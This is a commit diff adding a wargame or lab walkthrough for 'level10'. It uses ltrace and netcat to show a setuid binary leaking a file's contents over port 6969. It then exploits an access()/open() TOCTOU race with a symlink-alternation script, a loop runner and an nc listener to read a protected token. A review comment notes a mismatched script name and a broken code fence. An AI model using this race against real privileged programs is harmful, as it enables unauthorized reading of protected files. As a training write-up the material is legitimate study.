Update README.mdx
nuoxoxo authored Nov 18, 2024
1 parent 63ab754 commit 3cc3897
Showing 1 changed file with 98 additions and 0 deletions.
98 changes: 98 additions & 0 deletions level10/README.mdx
Expand Up @@ -54,5 +54,103 @@ printf("Connecting to %s:6969 .. ", "localhost") = 32
^^^^ 🟡
fflush(0xb7fd1a20Connecting to localhost:6969 .. ) = 0
^^^^ 🟡
Idea
- it eems the program interacts with `localhiost:6969`
- we need a valid Host IP :
- `127.0.0.1` or an old trick
- `ifconfig | grep 'inet ' | awk 'NR==2 {print $2}' | cut -d ":" -f2`
With correct IP:
```b
> ./level10 /tmp/tmp $(ifconfig | grep 'inet ' | awk 'NR==2 {print $2}' | cut -d ":" -f2)
Connecting to Localhost:6969 .. Connected!
Sending file .. wrote file!
```b
Inspect w/ `ltrace`:
```b
> ltrace ./level10 /tmp/tmp $(ifconfig | grep 'inet ' | awk 'NR==2 {print $2}' | cut -d ":" -f2)
__libc_start_main(0x80486d4, 3, 0xbffff7d4, 0x8048970, 0x80489e0 <unfinished ...>
access("/tmp/tmp", 4) = 0
printf("Connecting to %s:6969 .. ", "Localhost") = 32
fflush(0xb7fd1a20Connecting to Localhost:6969 .. ) = 0
socket(2, 1, 0) = 3
inet_addr("Localhost") = 0x0100007f
htons(6969, 1, 0, 0, 0) = 14619
connect(3, 0xbffff71c, 16, 0, 0) = 0
write(3, ".*( )*.\n", 8) = 8
printf("Connected!\nSending file .. "Connected!
) = 27
fflush(0xb7fd1a20Sending file .. ) = 0
open("/tmp/tmp", 0, 010) = 4
^^^^^^^^ 🟡 here is where we hope to force our token in
read(4, "", 4096) = 0
write(3, "", 0) = 0
puts("wrote file!"wrote file!
) = 12
+++ exited (status 12) +++
```

Maybe it sends content of our file to `localhost:6969`
- try and intercept the content
- for that we use a 2nd terminal

```b
# t1
> nc -lk 6969
```
```b
# t2
> ./level10 /tmp/tmp Localhost
> Connecting to Localhost:6969 .. Connected!
Sending file .. wrote file!
```

Figure out a way to make `./level10` to read the true `token`:
- exploit `access()`'s [TOCTOU](https://stackoverflow.com/questions/75587120/how-to-handle-toctou-problem-between-access-and-unlink) vulnerability
- design a file to do the following:
- when `access()` is called it checks the low-priority file
- after that, `./level10` should `open()` and `read()` the high-priotity one

Solution: \
to trick `access` we need a file that _alternates_ its type
- a file of our own permission level
- a symlink of the same name linked to `token`
- we need an alternation script

`alternate.sh`
```b
#!/bin/bash
t=/tmp/tmp
#timeout 2s bash -c '
while true; do
touch $t
rm -rf $t
ln -s /home/user/level10/token $t
rm -rf $t
done
#'
```

- and a script to run `alternate` and `./level10` side by side

`trylevel.s`
```b
#!/bin/bash
#timeout 2s bash -c '
while true; do
/home/user/level10/level10 /tmp/tmp 127.0.0.1 >/dev/null
done
#'
```

- and a 3rd script to unite two previous ones and `netcat`
```b
/tmp/alternate.sh 2>/dev/null & /tmp/runner.sh >/dev/null & nc -lk 6969
```
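Review bot: the combined command at the end starts `/tmp/runner.sh`, but the runner script introduced just above is titled `trylevel.s`, so the last line will not find it as written; since it is a bash script, rename it to `trylevel.sh` (the `.s` suffix reads as assembly) and reference that name in the combined command, or call the file `runner.sh` consistently in both places. Also, the fence that is meant to close the first block after "With correct IP:" carries the `b` info string; a closing fence cannot have an info string, so in MDX that block stays open through the "Inspect w/ `ltrace`:" line and the second fence, and only ends at the bare fence after `+++ exited (status 12) +++`. Minor typos in the same hunk: "eems", "localhiost", "high-priotity", and the stray trailing backslash after "Solution:".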
